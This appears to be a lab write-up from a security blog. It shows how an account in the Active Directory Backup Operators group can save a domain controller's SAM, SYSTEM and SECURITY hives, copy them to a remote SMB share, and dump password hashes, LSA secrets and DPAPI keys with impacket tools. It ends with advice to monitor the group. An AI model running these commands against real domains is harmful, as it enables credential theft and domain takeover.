Backup Operators is a default security group in Active Directory. Microsoft provide the following description;
Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group can’t be renamed, deleted, or removed. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers.
This article will look at a couple of ways of extracting the SAM database of a domain controller using an account that is a member of the Backup Operators group.
Local SAM Database Extraction
In our lab environment, we can see the user Alice is a member of the Backup Operators and Remote Management group;
net user alice /domain
The request will be processed at a domain controller for domain bordergate.local.
User name alice
Full Name alice
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 01/12/2023 12:56:20
Password expires Never
Password changeable 02/12/2023 12:56:20
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 26/01/2024 14:15:42
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
Since Alice is a member of the Remote Management Users group, we can create a PSRemoting session to the domain controller. Since they have the SeBackupPrivilege as being part of the Backup Operators group, we can take a copy of the HKLM SAM and SYSTEM hives.
PS C:\Users\alice> Enter-PSSession DC01
[DC01]: PS C:\Users\alice\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
[DC01]: PS C:\Users\alice\Documents> reg save hklm\sam c:\Windows\Tasks\SAM
The operation completed successfully.
[DC01]: PS C:\Users\alice\Documents> reg save hklm\system c:\Windows\Tasks\SYSTEM
The operation completed successfully.
[DC01]: PS C:\Windows\Tasks> copy SAM \\192.168.1.210\shared\SAM
[DC01]: PS C:\Windows\Tasks> copy SYSTEM \\192.168.1.210\shared\SYSTEM
We can then use impacket-secretsdump to extract the local administrator credentials for the host;
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x8ac0fb2e229cb0c79777bb8125015a6c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bce86ff3bde5a13e0a97398231766df1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
Remote SAM Database Extraction
If the user is unable to interactively login to domain controllers, we can still extract the SAM database remotely using a patched version of the impacket reg.py tool, which is available here; https://github.com/horizon3ai/backup_dc_registry.
python reg.py alice:'Password1'@192.168.1.205 backup -p '\\192.168.1.210\shared\'
Impacket v0.11.0 - Copyright 2023 Fortra
Dumping SAM hive to \\192.168.1.210\shared\\SAM
Dumping SYSTEM hive to \\192.168.1.210\shared\\SYSTEM
Dumping SECURITY hive to \\192.168.1.210\shared\\SECURITY
Since the SECURITY hive is also backed up using this method, we can also extract LSA secrets;
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x8ac0fb2e229cb0c79777bb8125015a6c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bce86ff3bde5a13e0a97398231766df1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:25069e75ab3f1b9321b9c9455bf7627aef9d778bac417b22f0ec1c0694511eb38d702273c060276d1be8a5ab54b7fa8eba7a21ee5abfd801d78775c2a33b01e448709fc230db4b41b21976503f308897f32302fee191e98b85f468b8846df1bc54ea4a2231c764ac4ee9ba8ea8e701762c64a05717cced16036dbeda9725ebb9f92a6ed288d6904bbde92bb72b06438504d1ed8c8a7c59f49e5107114cd6a684cec67460cdf6a26176a0523fed417714287021725eeb8a0dc47b51bf8a0faf9b44806fa01a83ac037da40ef7a7c55a25ed02b1d77cb47bf6f8a8f51ea65b7ab69354d52856f5f5a068c8ef8442a6e41c
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:92312aa97b085a7d597f5aa8af114c9f
[*] DPAPI_SYSTEM
dpapi_machinekey:0x06d5b029e0966077058a8f25dfd3fa714c936f90
dpapi_userkey:0xfe1b2836006a6f73943efc9dc6cf2d0a43d90e88
[*] NL$KM
0000 43 8F 81 A3 36 D3 B0 2B 87 BA 1C 95 AF BE 33 DA C...6..+......3.
0010 92 94 45 3E 55 BD EE 67 D7 F0 05 50 39 CA 7F F9 ..E>U..g...P9...
0020 D9 9D 8B FD C9 B7 F4 8C 25 89 9B 52 CB 27 2E C0 ........%..R.'..
0030 42 E7 3E DB 56 35 70 8E 41 C6 78 A5 20 F2 C6 C4 B.>.V5p.A.x. ...
NL$KM:438f81a336d3b02b87ba1c95afbe33da9294453e55bdee67d7f0055039ca7ff9d99d8bfdc9b7f48c25899b52cb272ec042e73edb5635708e41c678a520f2c6c4
[*] Cleaning up...
The machine account credentials could then be used to DCSync domain credentials.
In Conclusion
Backup Operators is a privileged group, and should be monitored and protected in a similar manner to Enterprise/Domain administrator groups.